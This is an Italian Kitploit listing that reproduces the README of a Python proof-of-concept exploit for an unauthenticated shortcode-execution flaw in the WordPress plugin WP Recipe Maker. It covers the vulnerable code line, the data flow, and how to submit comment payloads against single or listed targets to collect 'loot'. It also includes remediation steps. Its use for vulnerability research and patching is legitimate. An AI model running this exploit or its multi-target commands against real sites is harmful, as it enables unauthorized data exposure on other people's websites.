Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-.CVE-2026-89274 — PoC exploit in Python per CVE-2026-89274, una vulnerabilità di esecuzione arbitraria di shortcode non autenticata in WordPress WP Recipe Maker <= 10.8.1 tramite i commenti alle ricette. | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

PoC exploit in Python per CVE-2026-89274, una vulnerabilità di esecuzione arbitraria di shortcode non autenticata in WordPress WP Recipe Maker <= 10.8.1 tramite i commenti alle ricette.

Vedi Repository
5h 8m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept exploit per CVE-2026-89274 — vulnerabilità Unauthenticated Arbitrary Shortcode Execution nel plugin WordPress WP Recipe Maker versione ≤ 10.8.1.

⚠️ AVVISO LEGALE ED ETICO Questo script è fornito solo per ricerca sulla sicurezza in ambienti locali (localhost/lab) e non deve essere utilizzato contro sistemi che non vi appartengono o senza autorizzazione scritta. L'autore non è responsabile per qualsiasi uso improprio. L'utilizzo contro sistemi di terze parti senza autorizzazione può violare la legge penale.


📌 Riepilogo della Vulnerabilità

CampoValore
CVE IDCVE-2026-89274
TargetWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
ClasseCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
VettoreContenuto dei commenti alle ricette (unauthenticated)
Sinkdo_shortcode() in class-wprm-metadata.php
ImpattoEsecuzione di shortcode server-side → fuga di dati tramite JSON-LD pubblico
AuthorPoloss

Root Cause (patch-diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnerable (10.8.1):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() esegue prima lo shortcode, poi strip_shortcodes() pulisce solo l'output — non c'è alcuna protezione.

Patched (10.8.4):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

Flusso dei Dati

root@kitploit:~
comment_content (commento pubblico su un post ricetta)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK ESECUZIONE
                   └─> wp_json_encode() in <script type="application/ld+json">

Prerequisiti

  1. Il commento contiene il campo wprm-comment-rating (compilato tramite il form dei commenti).
  2. Il commento è approvato (auto-approve o manualmente da un moderatore).
  3. Non è richiesta autenticazione.

⚙️ Installazione

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# Nessuna dipendenza esterna — solo standard library di Python 3.

Requisiti: Python 3.8+.


🚀 Utilizzo

Target singolo

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

Target multipli (file)

Formato targets.txt (uno per riga, url[,post_id]):

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# le righe di commento vengono ignorate
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

Opzioni CLI

FlagDefaultDescrizione
-u, --url—URL del target singolo
-f, --file—File con la lista dei target (url[,post_id] per riga)
-p, --post10ID del post che contiene la ricetta
-t, --threads5Numero di worker thread
-o, --outputcve-2026-89274-loot.jsonFile di output JSON
--shortcode[wprm-recipe-name id=11]Payload shortcode da eseguire
--markerPoC RecipeSottostringa di prova dell'esecuzione in reviewBody
--rating5Valore del rating WPRM
--timeout25Timeout per-request (secondi)

🔍 Come Funziona lo Script

  1. Baseline — GET della pagina del post, estrazione del blocco <script type="application/ld+json">, raccolta dei reviewBody.
  2. Invio commento — POST a /wp-comments-post.php con il payload + campo wprm-comment-rating.
  3. Polling — GET ripetuto della pagina per rilevare l'auto-approvazione del commento.
  4. Verifica — Se --marker appare in reviewBody → EXPLOITED. Altrimenti → PENDING_APPROVAL.
  5. Output — Salvataggio dei risultati in JSON.

Stato dell'Output

StatoSignificato
EXPLOITEDShortcode eseguito e output trapelato nel JSON-LD pubblico
PENDING_APPROVALCommento inviato, in attesa di approvazione del moderatore
FAILPagina non raggiungibile / commento rifiutato / errore

📄 Esempio di Output JSON

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ Remediation

  • Aggiornare WP Recipe Maker a ≥ 10.8.4.
  • Nel frattempo, disabilitare i commenti sui post delle ricette o impostare comment_moderation = 1 e controllare rigorosamente i commenti.
  • Applicare una regola WAF per bloccare la sintassi degli shortcode ([...]) nei campi dei commenti.
  • Verificare i commenti esistenti alla ricerca di payload shortcode sospetti.

📁 Struttura del Repo

root@kitploit:~
.
├── CVE-2026-89274.py           # exploit principale
└── README.md                   # questo documento
Scarica lo strumento